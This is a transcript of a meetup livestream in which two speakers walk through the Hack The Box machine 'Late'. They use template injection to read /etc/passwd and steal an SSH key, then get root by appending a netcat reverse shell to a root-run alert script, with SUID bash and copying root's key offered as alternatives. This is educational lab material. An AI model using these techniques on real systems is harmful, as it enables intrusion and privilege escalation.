yeah, true. There's this. Let's go copy some part. Try and copy some part. There we go. Did I close Word? No. There's the decoder. We paste it. Decode as HTML, and then we already get much more readable stuff. So there's a not found object, a build error object, euro quote, which is actually a function. You see all these functions and objects that are available in this Python runtime. And one of the beautiful things of Python is that it has a lot of really neat built-in functions, which you can also access, right? So let's take that step. Not this one. Where's my terminal? Let's ask it for the built-ins. Almost did it correctly. Built-ins, and we will get more of the same. We will go into the built-in part of it. which is really neat. And if we follow along, there is actually an open function like open a file function, which should be here somewhere. Too much data. For the one who likes Where's Waldo, find the open function. Right? There's an open function here.
You can use a find, right, in the console. I think it's Command F or something.
Yeah, if I knew how to work that. I generally just copy it over to my beautiful editor and then I'll be gone with it. But I don't want to get any more slack like last time when I was hounded for my ability to use a decent text editor. Anyway, all funniness. There is actually, for your UX person, beautiful. Thank you. I love butter. It was so sad. We had the last fiscal meetup. There were all these stickers, and there were so many FIM stickers left, but all the Emacs stickers were gone already. So
you're gonna have a problem with the quotes, though.
Yes, beautiful. Well seen. So we take the last part of the thing. Let's do it without the read, so we can see what good to. Instead of just copying it in one go, to just do step by step to see what you get and to understand what you're getting here. We'll use the open function, which is used to open files, and we'll open a file that we know will be there, etc. password. And let's see what we get returned. Something completely unexpected. Let's see if our payload.
Ooh, no. I think your bash script is cutting it off.
Indeed. Probably we have multiple levels of processing, of course. My terminal is reading it. That is converting this slash quote to a single quote, to a single double quote. And then it gets inserted into the thingy. So we need to be better at quoting. So I think we need more slashes. When in doubt, just add some slashes. Hey, that works. If we look at the image now, we'll see it works. We do note that we're almost at the end here. We increased the font, so maybe we need to have a bigger image. So something to keep in mind. So what does it say? It has an IO text IO wrapper, name for etc. password, mode readable, encoding UTF-8. So it can access it, but it does not do anything yet because we have to ask it to read the image to the file. So when doing this, all this stuff, we should actually have the password file.
Woo.
Nice. And I think we're also at the end of the image. Yeah, pretty much. So in case we get into trouble,
add more horizontal space.
Yeah. See if it still works.
Well, here it got finicky for me because when I used a too large image. Oh, you added the wrong dimension. Yeah, I used a very wide image, both horizontally and vertical, and then the OCR didn't zoom in on the text, so it was. I think it just could not read the text properly.
Yeah, it's a little bit finicky when it goes like that. This still works. I've so we have some more white space. So whenever you do stuff like this, make small changes. Do not go wild and change like 10 times, 10 things, because you will not know what works. So we can read this file, which is beautiful. As we expected, we have this service account, home svc_acc, that can actually log in. So, and the only way we found to log in is SSH up to now. And that's it. Basically, nothing much more. I always look at these ending lines what you want to know is, does it have a shell? Most things will have no login or a false. If there's anything different, it means it will probably log in if it's a shell or an application like that. So this is our log-inable user. So nice. Yeah, nice. So what did you do now?
So
Rabbit hole number 2.
yeah, I used a little bit of a different command, but it also ended in a different path. So I think here you can see it. Oh, sorry, I'm pointing at my own screen. Cycler, init, globals. I used that one.
Yeah.
It was kind of the first one that worked for me. So it's like, okay, let's go all in on that one.
Give that a
Yeah,
try.
the funny thing with this one is you actually open a pipe with popen to a command, and then you can say read the result of that pipe or that function, and it by default reads like, I don't know, a set amount of characters. But if your result is larger than that, you have to also tell him how much characters he can read.
Yeah, I understand. Yeah. See if OCR will work with us.
Forward slash.
Yeah.
Forward slash.
The factor in it.
Wait, I will send you the command that I was using in this stage. I think I have it somewhere here.
I think it's the what you will call it, the OCR that does not really work.
I'll add it to the meetup text.
All right. Yeah, and then what types of things did you try?
Yeah, so the first thing, I just wanted to know the ID of the application that was running this function. So it could be that it is a microservice setup underneath that use different accounts, and etc. So I was like, maybe this is an easy path to a different user than the service account user. Also, the last time you got that error message with that path, with the home /service account, I was like, okay, let's fire up some brute forcing on the SSH. I was like, maybe I'll get lucky. It's an easy machine. That, of course, didn't work. So I just got to iterating several commands here just to see what works and what didn't work. So I tried the popen ID, the thing you have on the screen right now. I did. I don't know why it's not reading. Can you do?
It's the OCR. It's the OCR.
Okay. So are you sure it's Fira code that is being used in your image?
Are you doubting me? No, let's see. Fire code bold. Let's try light. Give that a try. Why not?
Let's see.
That works. So it executes.
I used the font size of 48 actually.
Big baller.
Yeah, you know how I roll. So I just went through the same steps, right? Just read the ID to see who is executing this code. Then I just started iterating some stuff like, can I read the etc. password file? Can I exactly read the processes with PS? That kind of stuff. And then let's see what I did next. Oh yeah, then I just tried to see what's in the home directory. I think that's the home service account directory, actually. So maybe we can do that. Just list.
I'm on it.
Yeah.
I wanted to start a reverse shell because I thought maybe you would say, well, let's try to run a reverse shell.
No, so in this scenario, I was like, okay, I can reach files, so let's see what we have. You have to add a. I had to add the / on the end, but it's not necessary in this. Yeah, so this one threw me for a loop. So at this point in time, you can just see, okay, there's a user.txt, so it's quite obvious what that could be. So let's read that first.
Oh, okay. Let's open. Well, we can do cuts, right?
Yeah.
Let's just do that. Cuts. User.txt. Almost. See, it actually shows the hash. So, yay, we have a hash, but I never like it this way because I want to be on the machine to do this, right?
Yeah, that would be my next step, and that was something that cost me some time.
Yeah, I lost a lot of time here as well because I thought, well, what about NC 10, 14, 45-ish, 1, 2, 3, 4, minus E bin bash. Will that work? I have a listener here. Nothing. I clear the screen. Nothing. So that did not work. That was horrible. So I tried different refer shells. It did not work.
Yeah, me too. I used that reverse shell website. We can generate them and just copy paste them in. And I got the reverse shell. It connected to my netcat, but when I tried to interact with it, it just failed every time.
Yeah,
and it was so
it
frustrating.
killed
I
itself.
spent the whole evening on that. It just it's crazy.
Shell. I will show the beautiful application that you're talking about if the browser will work with me. There we go. Is the ref shells? Yeah, this. So in this beautiful application, you can just say my IP address is 14.14.45, and I'm at port 1234. Tells you how to run your listener. And then we can say, well, these are all the possibilities that we can run, and will beautifully make a command for you that you can just copy paste. And the beautiful thing here is that you can just clone it and have a local copy as well. So there's a lot of stuff from PHP stuff to Python stuff. I believe I also tried Python one-liners in this stuff. Was kind of a mess.
Also, the make Vivo one, I had some success with that in previous boxes, but it didn't work here.
That's the. Let's see, that is the SH
That
version.
one, no, some little bit up.
Up.
It's outside of your screen now. Just
this one. Yeah. It did not really work for me. At least I did not get a stable show.
No.
So after spending some headache on that, I went back to enumerate the machine. I need to learn how to type, right? This is key thing. So there's some basic things here. ESP Chris has a CLI application as well. So nice, very nice. And there's a .ssh directory that I found interesting, especially since we have an SSH service, right? If you list it, it will actually have beautiful keys, which is nice, which is beautiful. So I take it you also downloaded this key, right?
Yeah. Well, I think I printed the key and then just copy pasted because I have the script that I use prints out the results to the console, so it works the same.
So if we do a cut,
just
At
like
this
this.
point, you are probably tempted to do this, which is a horrible idea because it will copy white space on the side. And so the best thing to do is to a redirect to late.key.
I think I just
And
copied.
well,
Yeah.
for me, it always breaks when I copy it. Maybe
Oh,
that's just my luck. I will use this editor that is being raved about just to remove some stuff. Right, begin key, and then take the back. And the important thing here is that there should not be any white space at the end of these lines. If there are, then it will say that the key is invalid. So keep that in mind. Utimuti says, does it come with ed? And said, yes, it does. Do I know how to use it?
a little bit.
Yeah, set -G, but yeah, go ahead. Let's give it some proper permissions.
Yeah, this was something that gave errors when I tried to use it. You have to set the permissions for the key first.
Yeah, if you don't do that, let's change it. It will, if we do 655, it assumes, or it has the requirement that the key is private to only you. And if
Yeah.
you do this, then other people can read the key, so it's no longer a private thing. And it will fill, and it will tell you the key. And it will tell you that it has bad permissions.
Yeah.
Bad, not good, bad. So we need to set it to 600. There you go. We'll do the SSH thing. I took this from Chris last time, right? The fuzzy find things. Beautiful. Changed my life. And if we do that, we can actually log into the machine. Who am I? Or ID if we want. Hostname. Beautiful. Add user text. We have a full interactive shell. So we have user ownership. So yay, beautiful, beautiful, a very nice area. Oh my! People are talking about the ed. Which ed? Oh god, let's not do this. So yeah, then we get to a very interesting part: the enumeration of the machine. Looking at the time, we'll quickly do this. Generally, you'll run linpiece or linenum, which we can quickly do. And reappropriate this thing. I think I have the boxes directory here, right?
This was also a time sink for me because I ran it to the linenum first, and it gave a lot of stuff.
Yeah.
It didn't give me a root shell though.
No? Oh, no, I don't. Wait. SVC underscore ACC at late.htb. Almost. I want min piece, right? SVC at ACC at late.htb. Never forget the code.
Oh, you don't even have to specify the directory. I thought.
No, just put it in the home directory.
Okay. I thought you had to specify.
Do what I do. Just do what I say you should do. Right. That's the advice of life in this case. If we run linpiece, linpiece is a wonderful tool. We've talked about it many times already. Very awesome. gathers all the information. It gives us so much information about it. Yeah, there's some well-known exploitations that we can do. I hope the scroll back buffer is long enough.
Yeah, there's also another, somebody in chat already said that there's also a exploit suggester for Linux and Windows. That also just looks at the machine and just tries to propose you some nice exploits.
True story. It works quite well in most cases. And some things are already fixed. Let's see. We have enough scroll back buffer. So if we scroll through this real quick, one thing it notices, it says, dude, there's a old version of sudo, might be susceptible to something. There is a very interesting thing here. The path actually has something that we control as a first entry in the path, which is quite interesting. Normally, you won't see a user path as the first one, so that might be something to look at. And we can override a command or something like that. Then there's this the exploit suggester with PwnKit and Baron, same edit. Could be very interesting, but generally they are not the ones that you want for the box, simply because there's as the older a box gets, there's more vulnerabilities in it. This one has quite a lot, actually. Let's see. Stuff to run. Interesting is the capabilities that are displayed. So this system is using some capabilities. Let's see if there's anything interesting. We see our Python stuff running. Our limpies. There's actually a mail client running on this, or send mail thing as well. Interesting. Again, here it noticed that the path, that there's something funky with the path, the user local sbin. So we'll take a look at it in a little bit. Probably has something to do with being able to write or do something that we normally should not be able to do. All this stuff is very red. We'll leave it at that. If I scroll. This tool used to be very, very concise, and it just started growing with a lot of stuff. So it takes a lot of time to actually process what it is doing now. System stuff. ng-inks stuff. We don't need that anymore, I believe. The private key, we already have it. Thank you very much. So, yeah. As they, it notices the sendmail thingy. So that's interesting. And what else? Xlog. Is my terminal messed up, or is this something else? Yeah, then we get to interesting files, which is generally not very interesting most of the time. In this case, it is also not very interesting. But there is, or there should be. Yeah. One very interesting part, which generally does not show anything, is the .sh files in path, where it says that you own the script user local sbin ssh alert, which is really odd in the sense that it is in a very strange location. Use the local SBIN. So that caught my eye quite rapidly. SSH alert. So let's take a look at. We were also going to look at the use local SBIN. So we would have gotten there. For the rest, it is not very interesting, I believe. Did you have any other interesting finds here?
Well, I think the SSH alert script is very interesting because I also saw it, I believe, somewhere in the processes that it was executed by a very interesting user. So
Yeah, the question is, I think that was a very fortunate timing on your end.
yeah,
Um,
maybe so.
Has been. There's only one thing in there, and that's why it keeps saying, "Hey, there's something off with this." So there's this one thing. We own it. We can change it. So SSH alert. So root at late, email from server login SSH and SSH login was detected. It should give some information and then does the send mail thing. So there should be var log. See if there's any mail logging. Oh, we're not allowed to do that. But there should be the thing that I had here is that it showed, hey, whenever you log in with SSH, a notification is being sent out. So one tool that I know that is very useful in this case is something called pspy. And I believe I have it here somewhere. Probably in downloads. I'm very organized. All right. Yeah, this SCP pspy downloads pspy. I'll do both because why not? In the meantime, I'll look up the website pspy Linux, and it is basically a application that allows you to monitor processes on a Linux box from an unprivileged account, which is very, very useful. So lots of options. I never look at the options really. I just run it and then see what happens. So let's go back to our beautiful area here. We have those pspies plus X. Remember, I think the pspy 64 is the right one here. When we do it, it will get all the processes that are being spawned or have been spawned in the last couple of minutes. I believe it's a couple of minutes. It's not very long back, I believe. No. 1833, so that was just now. If we scroll through it, we see that this is the start of pspy itself. Sendmail is running, unicorn stuff is running, policy kit stuff is running, and that's about it, I believe. DH clients to get stuff like, I don't know, IP addresses. And the interesting thing is if you let it run, you'll notice what is being run in stuff like cron if you can't access cron itself. So in this case, we see that UID 0, so root, actually runs some scripts which are part of the root user. So cron.sh, that's being started, and that kicks off cron itself. But what it does, it copies root scripts SSH alert over that user local SBIN SSH alert. So our script is being replaced, and generally on a hacked box machine, that means you're intended to change the scripting. It's made executable, it's owned, and it removes all the uploads. And then this chatter thing gets done. And this is quite interesting because you don't see it a lot, but this is actually used to change extended attributes of of a file. And we'll get to that in a little bit. But let's see what happens when we log into the machine. Late log key. So we logged in, and now we can see what really happens. So where were we? We had this chmod plus x SSH get started. Then, as the root user, this script is run, and we are owner of this script, right? So whenever this is run, it is run as the root user. It sends an email that we saw as part of the script that does all these stuff. That's very interesting. And then we get logged in into the machine, and we are in Bash. So given this, I was 100% certain that this was the thing that we needed to do, this SSH alert thingy. So yeah, let's do that. So if we look at the permissions of this thing, we are owner, and we can write to it. So my first thing was to open up an editor, go into SSH alert, and do
Hello world.
yeah, we cannot do that really, all right. But we can create a reverse shell, maybe. I don't know. I forgot what I did. Maybe I added myself to. No, I don't. My window. No. Oh, what did I do? How do I get back to the window? Go back. No. Oh, foobar. They changed or the where is my terminal? Tmux key binding things changed. Wait there. Did I open a different terminal? No. Did I mess it up? No.
Did you close your session or something?
Yeah, I think so. Tmux minus R. Oh, how do I get my terminal back? No.
Sorry, I don't know.
Yeah, it will take 20 seconds for Chris to stop laughing and tell me Tmux add. Thank you. Chris, I love you, man. I love you. Right, this is what I wanted. If my computer works, give me my terminal. Thank you. I don't know if I did the LMTP. Let's give it a try. Netcat 10 10 14 45 1 2 3 4 minus e bin bash. See, that did not work. So I did not give myself access to a reverse shell, I believe. I don't know. What did you do to get?
Yeah, I tried to edit the file, so I just started typing some echo, whatever.
Okay. Oh, hello.
Yeah, something like
that. And then it said it's not allowed.
Yeah.
And this is the part where I went like, what the hell?
Yeah.
Because I did not notice the change adder first. So no, because I was certain it was my file. It says here it is my file, but I'm not allowed to edit it. And then I noticed the change adder, and there's actually a ls adder as well, which will give you a long listing of extended possibilities. And when you look into this, you will notice that we're allowed to write to the file only to add to it.
Yeah.
Yeah. So,
Yeah, that's.
what did you do then?
Yeah, well, we discussed it this afternoon. I was very frustrated at this point because I was like, okay, this is clearly the point that I have to use this shell script to get the root users to do stuff for me. So, oh, that's a nice one.
Yeah,
I
Boris says it in.
didn't even notice this, but I just tried some example I found online or something that has a reverse shell, and then it just echoes the reverse shell code into the file with the append sign. I don't know how to call it. It's the arrows to the right, and it just so CTFL says it in the chat. It just echoes something into the file, and then that works. And so I first tried that, but I also noticed that the file got changed up. So
Yes.
when you say echo hello world, whatever, and then you
need to be fast.
You do a cat after that, it has the file, and then you try to log in, and then all of a sudden it didn't echo anything. That was very frustrating again.
Yeah, because let's set this to the ready. Whenever you change this file, we saw in the pspy output, where are you? In the pspy output, we see that it gets changed. It's 41, 40. So every minute, it will overwrite the file.
Yeah, and also the CP line under that line is the most important part. It overwrites it there.
Yeah.
And I didn't even know this tool existed, so I was like, "What's happening?"
Beautiful. Yeah.
So that was my next couple of hours spent.
Yeah. So let's first try and see if we can find a shell that works. We will put this ready. Let's give this a try. This actually works. We're now me, so we found a reverse shell that will work.
Yeah.
We'll do this, and we'll do echo this to ssh.alert. This is ready. This is ready. This is ready.
It's a couple of steps you have to go through.
Yeah. And now we need to be very fast. So I'll append this. Hit this.
Oh, it failed.
It failed. It failed miserably. Now it could fail because I did something wrong, right? Let's.
Oh yeah.
Let's see if it. So this actually works. The question becomes: does it actually work inside the script? Right. That's a good question. So did I just kill my listener?
I used a different reverse shell. I can send it if you want.
Oh yeah, sure. Wait. You can just say it if you want.
Should I send it in the chat or what's?
It actually worked. So last time I was on a copy moment. ID not found. Nice. ID. There we go. I never trust a computer. So what happens is, well, in this case, it was I actually was quick enough to see it twice, but it means that my previous attempt probably was just at the moment when it was overwritten. So at the start, before you figure out that it gets overwritten and stuff like that, you'll mess that up. But now it actually worked nicely. So that's good. Which one did you use? Let's see the.
Or I can send it in the chat.
Yeah.
Let's see. Because I was also getting issues with the file gets replaced by the copy command. So my command just also just SSH to localhost. So it just immediately echoed it in and then just SSH'd it, and then it worked.
Yeah, G also has a very interesting observation. He says that you can also just create a date command because we have ownership of the path. Um, let's user local has been let's yeah, we have full ownership of this directory, so we could, and it's the first one in the path. Then we can override something that is being used when we log in with SSH, such as the date. Yeah, so that's very interesting. Maybe G, maybe you did it this way. Maybe you can share the code that you used to do it. Probably it is a simple C shell C where it does a set UID parting. Yeah, interesting. Yeah, Delta Echo. All right, nice. Yeah, but we have root. We have to prove it, of course, because else it did not happen. Root.txt. There's our beautiful show. I wonder if there's actually SSH. We could have also appended our key to the authorized keys, of course, right? If you don't want to put a reverse shell, you can also use the script to append to authorized keys, and then you can just use any key that you want to get it. Or you could copy the ID RSA from root to temp and change its permissions, stuff like that. There's so many possibilities. We can actually show that. That's quite fun. That was another low effort solution that I came up with afterwards, after pounding my head on this beautiful desk of why can I not get a simple reverse shell to work. Dot SSH ID RSA to /tmp and say own svc underscore acc svc. I need to learn how to type. Temp ID RSA. If we add that to the script and then where's my SSH? Right. /tmp. But ID temp ID RSA. That's a very nice private key, and then we can do a go here. SP temp ID.
So you'll copy the ID RSA to your local machine and then use that for an SSH session, right?
Yeah. So do this, and then we do SSH -I root key root at late.h3. This should also work. That does not work.
Well, now you have to crack the private key password, right? Or isn't it?
No, it should be use it as an identity. I did not try this, but I thought it would work. Yeah. I actually added a host thingy, but that's a possibility to run through. What else do we have? I closed it. But the other one would be to make a binary to run as my user with SUID. Could also happen. You could make bash SUID, so it runs as which bash? Bash, nice, of course. Bin Bash. Let me know. Right, it's Bin Bash. Do you know that? Bin Bash. It's owned by Root, so you could do a.
Yeah, so Chris also mentioned this, I believe. He was like,
Yeah, sure.
copy
Give
some
him the credits. Yeah.
stuff.
What did he say? Ja, precies. Salp said it. Yeah. Screw it and right, do this. Now I need to go into my. Oh, yes, you did. I messed it up. Messed up. It's probably plus S. Right user to log in with private key. Yes, but it actually is the key for the root user. But anyway, you get the idea. You can use various things. I actually did the reverse shell, but there's a lot of possibilities to go through it. So, uh, uh,
So I don't know. Is this considered a easy machine? Because I think it's to get the foothold and to get the template injection working. It's pretty. We get that pretty quick. It's pretty obvious.
yeah,
Then
yeah,
the privilege escalation part is really tricky. You have to time it right, and there's a lot of stuff that
yeah.
just
The
gets in the
entire
way.
thing with the rating, basically, there's no need to write any code for this. There's no need to get custom things going.
Mm,
It's a matter of timing, but there's no difficulty in it in the sense that you need to have a very broad understanding of how Python works or how
mm.
you can do this. You can go to payload all the things and get pretty much the entire command that you need to send
Yeah,
and just get your key.
yeah.
So that's why it's considered easy. But if you notice on the rating given by people on this machine, which is always quite interesting. I don't know if I'm still logged in. Am I still logged in? No, I'm not
No.
logged in. But you'll notice that it leans more to the lower end of medium due to the OCR being a pain in the ass and
Yeah.
timing being quite difficult. So, yeah. Nice. Yeah. Sob says he didn't find it hard. Now it's once you get into the point where you know where to be, and that SSH alert is quite interesting. There's so many interesting things, and Sob he just went with the CMod plus S for bin bash, which actually works when you do the bash minus p as Chris says in the chat, then we are root, and it works beautifully. So, very nice machine, very nice machine. A beautiful opportunity to practice automating stuff, right?
Yeah.
Automating images generation, uploading it to the server. You can do it in 3 lines of Bash. You can write a somewhat lines of Python. You can do a Rust application. You can learn a lot of things, so it's quite nice.
Yeah.
I quite enjoyed this machine. So very beautiful. I will remove my screen. So nice. Did you like this machine?
Well, I like the challenge, but it was also a frustrating machine for me because every time I thought, okay, this would work for sure, and then it came down to a timing issue, and I was like baffled why it didn't work, why my file was removed or reset, and I remember another machine that also has a timing issue with resetting
Yeah.
files, and yeah, because
Yeah.
back then you can see that the timestamp of that file was rewritten every couple of minutes, every minute or something, and then you can
Yeah.
see,
True.
oh, okay, then you can use that file because it will be you can only use it for a limited amount of time. So I liked it, but it was giving me headaches.
Yeah, yeah, yeah. It's true. It's true. There's let's see in the chat. There's some questions. CTFL asks what shell I'm using. I'm using the default ZSH, but I think you're more interested in my Tmux configuration. I actually have a source for that. It's Packers, who has a very nice Tmux configuration, which is the thing that I'm using. It is just beautiful. I love it. But yeah, the key bindings is still something to get used to. So, all right, let's see if there's any more questions. Power line or 10K? No, there's no power line involved. There's just pure that configuration. I'm very happy that Chris is asking what I'm using, because I've stolen so many of his ideas for my configuration. So yay! Let's see. Yeah, most of us gibberish. Yeah, it's just a matter of taking a step back and just going step by step through it. It takes a long time to get to a point where you're comfortable with it. Let's see. For screwing things on the machine, since I use private machines. Yeah, okay, yeah. One thing that is noted: if you change something in a binary of a shared machine, or you put files in a location where other people find it and it's a shared environment, you will spoil it for the others, which is a very valid point. Yeah, in the lab we have private machines, stuff like that. VIP has private-ish machines, so yeah. Okay, still stuck at the object bar. I know what that I need to call objects, but which ones I see are used get flash. But why? That's a good question, Eden. The get flashed messages. If you look through the payload, all the things, and you try them one by one, you'll notice that you cannot just go from a string to its properties, stuff like that, because it's probably Python 3. But the get flashed messages is one of those functions that retrieves, gives us the ability to access other objects. And as it is a part of the Flask toolkit framework thing, it will always be there given the proper Flask version. So it is something you can rely on for it being there. And then based on that, you can build your commands. So, and it was quite easy to use it from a command perspective. So that's why we used it. And it's the Kruise added another root user to the to the password file.
Yeah, that was an interesting one.
Yeah, that works as well. There are so many options that we can do, right? So yeah, always hack the box machines are not. We don't care about being noticed. I have a student who is in a particular line of work, and every time we do a box walkthrough, he always says, "Well, yeah, but I would have noticed you when you started hammering away like this." Very true story. We're not being covert, so if you want to be covert, you don't want to leave any traces, so you have to really think about the effect of your commands. So for now, YOLO, right? Let's see. Yeah, being bash, root bash. Yeah, there. Lots of options. Well, nicely done. I thought it was a very fun and entertaining machine with new things. So yeah, nice. I would say that with this we will close out the stream. Go back into Discord, chat a little bit. You still have a task. I know if gevulde cookie is still there. No, gevulde cookie left. So you have a beautiful task. Diplo.
Me?
Yes.
Oh, what do I do?
We still need to give away some stuff.
Oh, okay. So I just pick randomly, or do we have a bot or something for that?
No, I'm going to make a bot for it because I'm very not liking to pick people. But I'm not going. I don't have it now. So maybe with the next meetup, we will have a bot.
Yeah.
That would be fun.
Can I just throw something and?
No, we shall not talk about that anymore. No.
Okay.
We will close out the stream. We'll go into Discord and then we'll see that. So thank you for watching, everybody. I hope you had a great summer holiday. Next month we'll be back in Utrecht, and in October we'll be here. If all goes well, in October we should have Pandastorm talking about game hacking. The schedule is a little bit up in the air. There's some stuff to work out, but we'll make sure it will be fun. So see you next time, either in person or in 2 months digitally. Bye bye.